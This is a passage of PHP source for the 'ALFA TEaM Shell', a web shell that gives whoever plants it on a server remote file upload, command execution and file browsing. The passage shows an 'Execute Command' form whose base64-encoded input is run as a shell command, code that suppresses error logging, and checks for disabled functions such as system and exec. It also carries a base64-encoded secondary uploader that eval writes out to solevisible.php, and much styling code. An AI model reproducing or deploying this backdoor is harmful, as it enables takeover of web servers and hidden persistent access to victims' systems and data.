echo '<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo 'CWD: <input type="text" name="cwd" value="'.str_replace("\\","/",@getcwd()).'/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>';

if(isset($_FILES['file'])){

if(@move_uploaded_file($_FILES['file']['tmp_name'], __ZGVjb2Rlcg(@$_POST['cwd']).'/'.$_FILES['file']['name'])){echo '<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>'; }

else{echo '<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>'; }

}

echo '<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>

<hr><pre>';

if(isset($_POST['command_solevisible'])){

if(strtolower(substr(PHP_OS,0,3))=="win")$separator='&';else $separator=';';

$solevisible = "cd '".addslashes(str_replace("\\","/",@getcwd()))."'".$separator."".__ZGVjb2Rlcg($_POST['command_solevisible']);

echo alfaEx($solevisible);

}

echo'</pre>

</body></html>';

exit;}

@error_reporting(E_ALL ^ E_NOTICE);

@ini_set('error_log',NULL);

@ini_set('log_errors',0);

@ini_set('max_execution_time',0);

@ini_set('magic_quotes_runtime', 0);

@set_time_limit(0);

if(function_exists('set_magic_quotes_runtime')){

@set_magic_quotes_runtime(0);

}

foreach($_POST as $key => $value){

if(is_array($_POST[$key])){

$i=0;

foreach($_POST[$key] as $f) {

$f = trim(str_replace(' ', '+',$f));

$_POST[$key][$i] = decrypt_post($f, _AlfaSecretKey());

$i++;

}

}else{

$value = trim(str_replace(' ', '+',$value));

$_POST[$key] = decrypt_post($value, _AlfaSecretKey());

}

}

$default_action = 'FilesMan';

$default_use_ajax = true;

$default_charset = 'Windows-1251';

if(strtolower(substr(PHP_OS,0,3))=="win")

$GLOBALS['sys']='win';

else

$GLOBALS['sys']='unix';

$GLOBALS['home_cwd'] = @getcwd();

if($_POST["a"] != "GetPathHistory"){

if($_SESSION[__LAST_CWD__]!=$_POST['c']){

$_SESSION[__PATH_HISTORY__] = $_SESSION[__LAST_CWD__];

}

}

$GLOBALS["need_to_update_header"] = "false";

if(isset($_POST['c'])){

if(!@chdir($_POST['c'])){

$GLOBALS['glob_chdir_false'] = true;

}

}

$GLOBALS['cwd'] = (isset($_SESSION[__LAST_CWD__])&&$_SESSION[__LAST_CWD__]!=''&&!isset($_POST['c'])?$_SESSION[__LAST_CWD__]:@getcwd());

if(!@is_dir){$GLOBALS['cwd'] = @getcwd();}

if($GLOBALS['sys'] == 'win'){

$GLOBALS['home_cwd'] = str_replace("\\", "/", $GLOBALS['home_cwd']);

$GLOBALS['cwd'] = str_replace("\\", "/", $GLOBALS['cwd']);

$_SESSION[__PATH_HISTORY__] = str_replace("\\", "/", $_SESSION[__PATH_HISTORY__]);

}

if($GLOBALS['cwd'][strlen($GLOBALS['cwd'])-1] != '/' )$GLOBALS['cwd'] .= '/';

function alfaGetPathHistory(){echo (isset($_SESSION[__PATH_HISTORY__])&&!empty($_SESSION[__PATH_HISTORY__])?$_SESSION[__PATH_HISTORY__]: $GLOBALS['home_cwd']);}

function alfahead(){

if(!function_exists('sys_get_temp_dir')){function sys_get_temp_dir() {foreach (array('TMP', 'TEMP', 'TMPDIR') as $env_var) {if ($temp = getenv($env_var)) {return $temp;}}$temp = tempnam($GLOBALS['__file_path'], '');if (_alfa_file_exists($temp,false)) {unlink($temp);return dirname($temp);}return null;}}

$GLOBALS['__ALFA_SHELL_CODE'] = 'PD9waHAgZWNobyAiPHRpdGxlPlNvbGV2aXNpYmxlIFVwbG9hZGVyPC90aXRsZT5cbjxib2R5IGJnY29sb3I9IzAwMDAwMD5cbjxicj5cbjxjZW50ZXI+PGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjxiPllvdXIgSXAgQWRkcmVzcyBpczwvYj4gPGZvbnQgY29sb3I9XCJ3aGl0ZVwiPjwvZm9udD48L2NlbnRlcj5cbjxiaWc+PGZvbnQgY29sb3I9XCIjN0NGQzAwXCI+PGNlbnRlcj5cbiI7ZWNobyAkX1NFUlZFUlsnUkVNT1RFX0FERFInXTtlY2hvICI8L2NlbnRlcj48L2ZvbnQ+PC9hPjxmb250IGNvbG9yPVwiIzdDRkMwMFwiPlxuPGJyPlxuPGJyPlxuPGNlbnRlcj48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48YmlnPlNvbGV2aXNpYmxlIFVwbG9hZCBBcmVhPC9iaWc+PC9mb250PjwvYT48Zm9udCBjb2xvcj1cIiM3Q0ZDMDBcIj48L2ZvbnQ+PC9jZW50ZXI+PGJyPlxuPGNlbnRlcj48Zm9ybSBtZXRob2Q9J3Bvc3QnIGVuY3R5cGU9J211bHRpcGFydC9mb3JtLWRhdGEnIG5hbWU9J3VwbG9hZGVyJz4iO2VjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI0NSI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT48L2NlbnRlcj4nO2lmKGlzc2V0KCRfUE9TVFsnX3VwbCddKSYmJF9QT1NUWydfdXBsJ109PSAiVXBsb2FkIil7aWYoQG1vdmVfdXBsb2FkZWRfZmlsZSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkge2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBTdWNjZXNzZnVsbHkgOyk8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO31lbHNle2VjaG8gJzxiPjxmb250IGNvbG9yPSIjN0NGQzAwIj48Y2VudGVyPlVwbG9hZCBmYWlsZWQgOig8L2ZvbnQ+PC9hPjxmb250IGNvbG9yPSIjN0NGQzAwIj48L2I+PGJyPjxicj4nO319ZWNobyAnPGNlbnRlcj48c3BhbiBzdHlsZT0iZm9udC1zaXplOjMwcHg7IGJhY2tncm91bmQ6IHVybCgmcXVvdDtodHRwOi8vc29sZXZpc2libGUuY29tL2ltYWdlcy9iZ19lZmZlY3RfdXAuZ2lmJnF1b3Q7KSByZXBlYXQteCBzY3JvbGwgMCUgMCUgdHJhbnNwYXJlbnQ7IGNvbG9yOiByZWQ7IHRleHQtc2hhZG93OiA4cHggOHB4IDEzcHg7Ij48c3Ryb25nPjxiPjxiaWc+c29sZXZpc2libGVAZ21haWwuY29tPC9iPjwvYmlnPjwvc3Ryb25nPjwvc3Bhbj48L2NlbnRlcj4nOz8+';

$alfa_uploader = '$x = base64_decode("'.$GLOBALS['__ALFA_SHELL_CODE'].'");$solevisible = fopen("solevisible.php","w");fwrite($solevisible,$x);';

define("ALFA_UPLOADER", "eval(base64_decode('".__ZW5jb2Rlcg($alfa_uploader)."'))");

define("ALFA_TEMPDIR", (function_exists("sys_get_temp_dir") ? (@is_writable(str_replace('\\','/',sys_get_temp_dir()))?sys_get_temp_dir():(@is_writable('.')?'.':false)) : false));

if(!isset($_POST['ajax'])){

function Alfa_GetDisable_Function(){

$disfun = @ini_get('disable_functions');

$afa = '<span class="header_show_all">All Functions Accessible</span>';

if(empty($disfun))return($afa);

$s = explode(',',$disfun);

$s = array_unique($s);

$i=0;

$b=0;

$func = array('system','exec','shell_exec','proc_open','popen','passthru','symlink','dl');

$black_list = array();

$allow_list = array();

foreach($s as $d){

$d=trim($d);

if(empty($d)||!is_callable($d))continue;

if(!function_exists($d)){

if(in_array($d,$func)){

$dis .= $d." | ";$b++;

$black_list[] = $d;

}else{

$allow_list[] = $d;

}

$i++;

}

}

if($i==0)return($afa);

if($i <= count($func)){

$all = array_values(array_merge($black_list, $allow_list));

return('<span class="disable_functions">'.implode(" | ", $all).'</span>');

}

return('<span class="disable_functions">'.$dis.'</span><a href=javascript:void(0) onclick="g(\'GetDisFunc\',null,\'wp\');"><span class="header_show_all">Show All ('.$i.')</span></a>');

}

function AlfaNum(){

$args = func_get_args();

$alfax = array();

$find = array();

for($i=1;$i<=10;$i++){

$alfax[] = $i;

}

foreach($args as $arg){

$find[] = $arg;

}

echo '<script>';

foreach($alfax as $alfa){

if(in_array($alfa,$find))

continue;

echo 'alfa'.$alfa."_=";

}

echo '""</script>';

}

if(empty($_POST['charset']))

$_POST['charset'] = $GLOBALS['default_charset'];

$freeSpace = function_exists('diskfreespace')?@diskfreespace($GLOBALS['cwd']):'?';

$totalSpace = function_exists('disk_total_space')?@disk_total_space($GLOBALS['cwd']):'?';

$totalSpace = $totalSpace?$totalSpace:1;

$on="<span class='header_on'> ON </span>";

$of="<span class='header_off'> OFF </span>";

$none="<span class='header_none'> NONE </span>";

if(function_exists('ssh2_connect'))

$ssh2=$on;

else

$ssh2=$of;

if(function_exists('curl_version'))

$curl=$on;

else

$curl=$of;

if(function_exists('mysql_get_client_info'))

$mysql=$on;

else

$mysql=$of;

if(function_exists('mssql_connect'))

$mssql=$on;

else

$mssql=$of;

if(function_exists('pg_connect'))

$pg=$on;

else

$pg=$of;

if(function_exists('oci_connect'))

$or=$on;

else

$or=$of;

if(@ini_get('disable_functions'))

$disfun=@ini_get('disable_functions');

else

$disfun="All Functions Enable";

if(@ini_get('safe_mode'))

$safe_modes="<span class='header_off'>ON</span>";

else

$safe_modes="<span class='header_on'>OFF</span>";

$cgi_shell="<span class='header_off' id='header_cgishell'>OFF</span>";

if(@ini_get('open_basedir')){

$basedir_data = @ini_get('open_basedir');

if(strlen($basedir_data)>120){

$open_b=substr($basedir_data,0, 120)."...";

}else{

$open_b = $basedir_data;

}

}else{$open_b=$none;}

if(@ini_get('safe_mode_exec_dir'))

$safe_exe=@ini_get('safe_mode_exec_dir');

else

$safe_exe=$none;

if(@ini_get('safe_mode_include_dir'))

$safe_include=@ini_get('safe_mode_include_dir');

else

$safe_include=$none;

if(!function_exists('posix_getegid'))

{

$user = function_exists("get_current_user")?@get_current_user():"????";

$uid = function_exists("getmyuid")?@getmyuid():"????";

$gid = function_exists("getmygid")?@getmygid():"????";

$group = "?";

}else{

$uid = function_exists("posix_getpwuid")&&function_exists("posix_geteuid")?@posix_getpwuid(posix_geteuid()):array("name"=>"????", "uid"=>"????");

$gid = function_exists("posix_getgrgid")&&function_exists("posix_getegid")?@posix_getgrgid(posix_getegid()):array("name"=>"????", "gid"=>"????");

$user = $uid['name'];

$uid = $uid['uid'];

$group = $gid['name'];

$gid = $gid['gid'];

}

$cwd_links = '';

$path = explode("/", $GLOBALS['cwd']);

$n=count($path);

for($i=0; $i<$n-1; $i++) {

$cwd_links .= "<a class='header_pwd' href='javascript:void(0);' onclick='g(\"FilesMan\",\"";

for($j=0; $j<=$i; $j++)

$cwd_links .= $path[$j].'/';

$cwd_links .= "\")'>".$path[$i]."/</a>";

}

$drives = "";

foreach(range('a','z') as $drive)

if(@is_dir($drive.':\\'))

$drives .= '<a href="javascript:void(0);" class="header_drive" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';

$csscode =' -moz-animation-name: spin;-moz-animation-iteration-count: infinite;-moz-animation-timing-function: linear;-moz-animation-duration: 1s;-webkit-animation-name: spin;-webkit-animation-iteration-count: infinite;-webkit-animation-timing-function: linear;-webkit-animation-duration: 1s;-ms-animation-name: spin;-ms-animation-iteration-count: infinite;-ms-animation-timing-function: linear;-ms-animation-duration: 1s;animation-name: spin;animation-iteration-count: infinite;animation-timing-function: linear;animation-duration: 1s;';

echo '<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<meta name="ROBOTS" content="NOINDEX, NOFOLLOW" />

<link href="'.__showicon('alfamini').'" rel="icon" type="image/x-icon"/>

<title>..:: '.$_SERVER['HTTP_HOST'].' ~ ALFA TEaM Shell - v'.__ALFA_VERSION__.' ::..</title>

<link href="https://fonts.googleapis.com/css?family=Francois+One" rel="stylesheet">

<style type="text/css">

.hlabale {

color: #daf50c;

border-radius: 4px;

border: 1px solid #27979B;

margin-left: 7px;

padding: 2px;

}

#tbl_sympphp tr {

text-align: center;

}

.editor-view {

position: relative;

}

.view-content {

position: absolute;

overflow-y: auto;

width: 100%;

height: 475px;

}

*::-webkit-scrollbar-track {

-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,0.3);

border-radius: 10px;

background-color: #000115;

}

*::-webkit-scrollbar{

width: 10px;

background-color: #000115;

}

*::-webkit-scrollbar-thumb {

border-radius: 10px;

-webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);

background-color: rgb(30, 130, 181);

}

.editor-file-name {

margin-left: 29px;

margin-top: 4px;

overflow: hidden;

text-overflow: ellipsis;

white-space: nowrap;

}

.editor-icon {

position: absolute;

}

.is_active {

background: rgba(49, 55, 93, 0.77);

border-radius: 10px;

}

.history-list {

height: 88%;

overflow-y: auto;

}

#editor-minimized,#cgiloader-minimized {

display: block;

position: fixed;

right: -30px;

width: 30px;

height: 30px;

top: 30%;

}

.minimized-wrapper {

position: relative;

background: rgb(14, 48, 74);

width: 44px;

height: 167px;

cursor: pointer;

border-bottom-left-radius: 5px;

border-top-left-radius: 5px;

}

.minimized-text {

transform: rotate(-90deg);

color: wheat;

font-size: x-large;

display: inline-block;

position: absolute;

right: -51px;

width: 129px;

top: 50px;

border-top-left-radius: 4%;

height: 56px;

padding: 3px

}

.close-button,.editor-minimize {

height: 26px;

width: 38px;

right: 7px;

background: rgb(29, 86, 115);

cursor: pointer;

position: absolute;

box-sizing: border-box;

line-height: 50px;

display: inline-block;

top: 17px;

border-radius: 100px;

}

.editor-minimize {right: 50px;}

.close-button:before,.close-button:after,.editor-minimize:before {

transform: rotate(-45deg);

content: "";

position: absolute;

top: 63%;

right: 6px;

margin-top: -5px;

margin-left: -25px;

display: block;

height: 4px;

width: 27px;

background-color: rgba(216, 207, 207, 0.75);

transition: all 0.25s ease-out;

}

.editor-minimize:before{

transform: rotate(0deg);

}

.close-button:after {

transform: rotate(-135deg);

}

.close-button:hover:before,.close-button:hover:after,.editor-minimize:hover:before{

background-color: red;

}

.close-button:hover,.editor-minimize:hover{

background-color: rgba(39, 66, 80, 0.96);

}

#editor,#cgiloader {

display: none;

position: fixed;

top: 0;

width: 100%;

height: 100%;

}

.editor-wrapper {

width: 100%;

height: 100%;

position: relative;

top: 1%;

}

.editor-header {

width: 97%;

background: rgba(21, 66, 88, 0.93);

height: 37px;

margin-left: 13px;

position: relative;

border-top-left-radius: 15px;

border-top-right-radius: 15px;

}

.editor-path {

position: absolute;

font-size: x-large;

margin-left: 10px;

top: 6px;

color: springgreen;

}

.editor-modal {

position: relative;

top: 0;

background-color: rgba(0, 1, 23, 0.95);

height: 90%;

margin-left: 20%;

margin-right: 2%;

border: 2px #0e304a solid;

}

.editor-explorer {

width: 19%;

height: 90%;

background-color: rgba(0, 1, 23, 0.94);

position: absolute;

z-index: 2;

left: 1%;

border: 2px rgb(14, 48, 74) solid;

}

.editor-controller {

position: relative;

top: -13px;

}

.file-holder {

position: relative;

width: 100%;

height: 30px;

}

.file-holder > .history {

position: absolute;

color: rgb(3, 179, 163);

cursor: pointer;

left:5px;

font-size: 18px;

font-family: sans-serif;

width:89%;

height:100%;

z-index: 3;

border-radius: 10px;

transition: background-color 600ms ease-out;

}

.file-holder > .history-close {

display: block;

opacity: 0;

position: absolute;

right: 2px;

width: 20px;

top: 4px;

text-align: center;

cursor: pointer;

color: white;

background: red;

border-radius: 100px;

font-family: monospace;

z-index: 10;

transition: opacity 600ms ease-out;

font-size: 15px;

height: 19px;

}

.file-holder > .history:hover {

background-color: #646464;

}

.editor-explorer > .hheader {

position: relative;

color: rgb(20, 255, 7);

border-bottom: 2px rgb(32, 106, 162) solid;

text-align: center;

font-family: sans-serif;

margin-bottom: 10px;

height: 55px;

}

.editor-search {

position: absolute;

bottom: 7px;

left: 31px;

}

.hheader-text {

position: absolute;

left: 8px;

top: 2px;

}

.history-clear {

position: absolute;

right: 8px;

top: 2px;

cursor: pointer;

}

.editor-body {

position: relative;

margin-left: 3px;

}

.editor-anim-close {

'.showAnimation("editorClose").'

}

@keyframes editorClose {

0% {

transform: scale(1);

opacity: 1;

}

100% {

transform: scale(0);

opacity: 0;

}

}

.editor-anim-minimize {

'.showAnimation("editorMinimize").'

}

@keyframes editorMinimize {

0% {

right:0px;

opacity: 1;

}

100% {

right: -2000px;

opacity: 0;

}

}

.editor-anim-show {

'.showAnimation("editorShow").'

}

@keyframes editorShow {

0% {

right:-2000px;

opacity: 0;

}

100% {

right: 0px;

opacity: 1;

}

}

.minimized-show {

'.showAnimation("minimizeShow").'

}

@keyframes minimizeShow {

0% {

right: -30px;

opacity: 0;

}

100% {

right: 0px;

opacity: 1;

}

}

.minimized-hide {

'.showAnimation("minimizeHide").'

}

@keyframes minimizeHide {

0% {

right: 0px;

opacity: 1;

}

100% {

right: -30px;

opacity: 0;

}

}

.solevisible-text:hover {

-webkit-text-shadow: 0px 0px 25px #00FF00;

-moz-text-shadow: 0px 0px 25px #00FF00;

-ms-text-shadow: 0px 0px 25px #00FF00;

text-shadow: 0px 0px 25px #00FF00;

}

.update-holder {

position: fixed;

top: 0;

background-color: rgba(0, 24, 29, 0.72);

width: 100%;

height: 100%;

}

.update-partner {

width: 50%;

position: relative;

border-radius: 31px;

height: 200px;

background-color: rgba(3, 3, 41, 0.47);

text-align: center;

color: rgba(252, 253, 251, 0.88);

margin-left: 25%;

top: 23%;

font-family: "Francois One", sans-serif;

}

.update-partner:hover {

-webkit-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);

-moz-box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);

box-shadow: inset 0px 0px 99px 9px rgba(11,15,41,1);

}

.update-content {

position: relative;

}

.update-content > a {

text-decoration: none;

position: absolute;

color: rgba(103, 167, 47, 0.77);

left: 24%;

margin-top: 7%;

font-size: 40px;

font-family: "Francois One", sans-serif;

}

.update-close {

position: absolute;

right: 0;

margin-right: 23px;

top: 10px;

font-size: 27px;

background-color: #130f50;

width: 5%;

border-radius: 100px;

cursor: pointer;

border: 2px rgb(14, 38, 90) solid;

}

.update-close:hover {

border: 2px #25ff00 solid;

color: #FF0000;

}

.filestools {

height: auto;

width: auto;

color: #daf50c;

font-size: 12px;

font-family: Verdana,Geneva,sans-serif;

}

@-moz-document url-prefix() {

#search-input {

width: 173px;

}

.editor-path {

top:3px;

}

}

@keyframes spin {from {transform: rotate(0deg);}to{transform: rotate(360deg);}}

@-webkit-keyframes spin {from {-webkit-transform: rotate(0deg);}to {-webkit-transform: rotate(360deg);}}

@-moz-keyframes spin {from {-moz-transform: rotate(0deg);}to {-moz-transform: rotate(360deg);}}

@-ms-keyframes spin {from {-ms-transform: rotate(0deg);}to {-ms-transform: rotate(360deg);}}

#alfaloader{'.$csscode.'width:100px;height:100px;}

#a_loader{'.$csscode.'width:150px;height:150px;position:fixed;z-index:999999;top: 42%;left: 45%;display:none;}

.ajaxarea{border:1px solid #801818;color:#daf50c}#up_bar{background-color:red;width:0;height:2px;display:none;position:fixed;z-index:100000}#hidden_sh{background-color:#801818;text-align:center;position:absolute;right:0;left:90%;border-bottom-left-radius:2em}.alert_green{color:#0F0;font-family:"Comic Sans MS";font-size:small;text-decoration:none}.whole{background-color:#000;background-image:url(https://kelas.daqu.sch.id/theme/classic/templates/core/temletscalisc.png);background-position:center;background-attachment:fixed;background-repeat:no-repeat}.header{height:auto;width:auto;border:7px solid #801818;color:'.alfa_getColor("header_values").';font-size:12px;font-family:Verdana,Geneva,sans-serif}.header a{text-decoration:none;}.filestools a{color:#0F0;text-decoration:none}.filestools a:hover{color:#FFF;text-decoration:none;}span{font-weight:bolder;color:#FFF}.txtfont{font-family:"Comic Sans MS";font-size:small;color:#fff;display:inline-block}.txtfont_header{font-family:"Comic Sans MS";font-size:large;display:inline-block;color:#4d16ba}.tbltxt{font-family:"Comic Sans MS";color:#fff;font-size:small;display:inline-block}input[type="file"]{display:none}.inputfile{border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;border-radius:4px;height:20px;width:250px;text-overflow:ellipsis;white-space:nowrap;cursor:pointer;display:inline-block;overflow:hidden}.inputfile:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}.inputfile span,.inputfile strong{padding:2px;padding-left:10px}.inputfile span{color:#25ff00;width:90px;min-height:2em;display:inline-block;text-overflow:ellipsis;white-space:nowrap;overflow:hidden;vertical-align:top;float:left}.inputfile strong{background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:float;height:100%;width:109px;color:#fff;background-color:#801818;display:inline-block;float:right}.inputfile:focus strong,.inputfile.has-focus strong,.inputfile:hover strong{background-color:#46647A}.button{padding:3px}#addup,.button{cursor:pointer;border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#5550 0 4px;background-color:#000;color:green;border-radius:100px}#addup:hover,.button:hover{box-shadow:0 0 4px #27979B;border:1px solid #27979B;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:disabled:hover{cursor:not-allowed}td{padding:'.($GLOBALS['DB_NAME']['show_icons']=='1'?'0':'1').'px}.myCheckbox{padding-left:2px}.myCheckbox label{display:inline-block;cursor:pointer;position:relative}.myCheckbox input[type=checkbox]{display:none}.myCheckbox label:before{content:"";display:inline-block;width:14px;height:13px;position:absolute;background-color:#aaa;box-shadow:inset 0 2px 3px 0 rgba(0,0,0,.3),0 1px 0 0 rgba(255,255,255,.8)}.myCheckbox label{margin-bottom:15px;padding-right:17px}.myCheckbox label:before{border-radius:100px}input[type=checkbox]:checked + label:before{content:"";background-color:#801818;background-image:url('.__showicon('alfamini').');background-repeat:no-repeat;background-position:50% 50%;background-size:14px 14px;border:1px solid #0F0;box-shadow:0 0 4px #0F0}#meunlist{font-family:Verdana,Geneva,sans-serif;color:#FFF;width:auto;border-right-width:7px;border-left-width:7px;height:auto;font-size:12px;font-weight:700;border-top-width:0;border-color:#801818;border-style:solid}.whole #meunlist ul{text-align:center;list-style-type:none;margin:0;padding:5px 5px 7px 2px}.whole #meunlist li{margin:0;padding:0;display:inline}.whole #meunlist a{font-family:arial,sans-serif;font-size:14px;text-decoration:none;font-weight:700;clear:both;width:100px;margin-right:-6px;border-right-width:1px;border-right-style:solid;border-right-color:#FFF;padding:3px 15px}.foot{font-family:Verdana,Geneva,sans-serif;margin:0;padding:0;width:100%;text-align:center;font-size:12px;color:#801818;border-right-width:7px;border-left-width:7px;border-bottom-width:7px;border-bottom-style:solid;border-right-style:solid;border-right-style:solid;border-left-style:solid;border-color:#801818}#text{text-align:center}input[type=submit]{cursor:pointer;background-image:url('.__showicon('btn').');background-repeat:no-repeat;background-position:50% 50%;background-size:23px 23px;background-color:#000;width:30px;height:30px;border:1px solid #27979B;border-radius:100px}textarea{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}textarea:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]{padding:3px;color:#999;text-shadow:#777 0 0 3px;border:1px solid #801818;background:transparent;box-shadow:0 0 4px #801818;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}input[type=submit]:hover{color:#000;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:2px solid #27979B;-moz-border-radius:4px;border-radius:100px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}input[type=text]:hover{color:#FFF;text-shadow:#060 0 0 6px;box-shadow:0 0 4px #27979B;border:1px solid #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}select{padding:3px;width:162px;color:#FFE;text-shadow:#000 0 2px 7px;border:1px solid #801818;background:#000;text-decoration:none;box-shadow:0 0 4px #801818;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:#555 0 0 4px;-moz-box-shadow:#555 0 0 4px}select:hover{border:1px solid #27979B;box-shadow:0 0 4px #27979B;padding:3px;-webkit-border-radius:4px;-moz-border-radius:4px;border-radius:4px;-webkit-box-shadow:rgba(0,119,0) 0 0 4px;-moz-box-shadow:rgba(0,119,0) 0 0 4px}

.foottable{width: 300px;font-weight: bold;'.(!@is_writable($GLOBALS['cwd'])?'}.dir{background-color:red;}':'}').'

.main th{text-align:left;}

.main a{color: #FFF;}

.main tr:hover{background-color:#646464;}

.ml1{ border:1px solid #801818;padding:5px;margin:0;overflow: auto; }

.bigarea{ width:99%; height:300px; }

'.alfaCssLoadColors().'

</style>';

echo "<script type='text/javascript'>

var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';

var a_ = '" . htmlspecialchars(@$_POST['a']) ."'

var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';

var alfa1_ = '" . ((strpos(@$_POST['alfa1'],"\n")!==false)?'':htmlspecialchars($_POST['alfa1'],ENT_QUOTES)) ."';

var alfa2_ = '" . ((strpos(@$_POST['alfa2'],"\n")!==false)?'':htmlspecialchars($_POST['alfa2'],ENT_QUOTES)) ."';

var alfa3_ = '" . ((strpos(@$_POST['alfa3'],"\n")!==false)?'':htmlspecialchars($_POST['alfa3'],ENT_QUOTES)) ."';

var alfa4_ = '" . ((strpos(@$_POST['alfa4'],"\n")!==false)?'':htmlspecialchars($_POST['alfa4'],ENT_QUOTES)) ."';

var alfa5_ = '" . ((strpos(@$_POST['alfa5'],"\n")!==false)?'':htmlspecialchars($_POST['alfa5'],ENT_QUOTES)) ."';

var alfa6_ = '" . ((strpos(@$_POST['alfa6'],"\n")!==false)?'':htmlspecialchars($_POST['alfa6'],ENT_QUOTES)) ."';

var alfa7_ = '" . ((strpos(@$_POST['alfa7'],"\n")!==false)?'':htmlspecialchars($_POST['alfa7'],ENT_QUOTES)) ."';

var alfa8_ = '" . ((strpos(@$_POST['alfa8'],"\n")!==false)?'':htmlspecialchars($_POST['alfa8'],ENT_QUOTES)) ."';

var alfa9_ = '" . ((strpos(@$_POST['alfa9'],"\n")!==false)?'':htmlspecialchars($_POST['alfa9'],ENT_QUOTES)) ."';

var alfa10_ = '" . ((strpos(@$_POST['alfa10'],"\n")!==false)?'':htmlspecialchars($_POST['alfa10'],ENT_QUOTES)) ."';

var d = document;

var mysql_cache = {};

var editor_files = {};

var editor_error = true;

var editor_current_file = '';

var is_minimized = false;

var cgi_is_minimized = false;

var cgi_lang = '';

var upcount = 1;

var islinux = ".($GLOBALS['sys']!="win"?'true':'false').";

var post_encryption_mode = ".(__ALFA_POST_ENCRYPTION__?'true':'false').";

function set(a,c,alfa1,alfa2,alfa3,alfa4,alfa5,alfa6,alfa7,alfa8,alfa9,alfa10,charset) {

if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;

if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;";

for($j=1;$j<=10;$j++){

echo 'if(alfa'.$j.'!=null)d.mf.alfa'.$j.'.value=alfa'.$j.';else d.mf.alfa'.$j.'.value=alfa'.$j.'_;';

}

echo "

if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;

}";

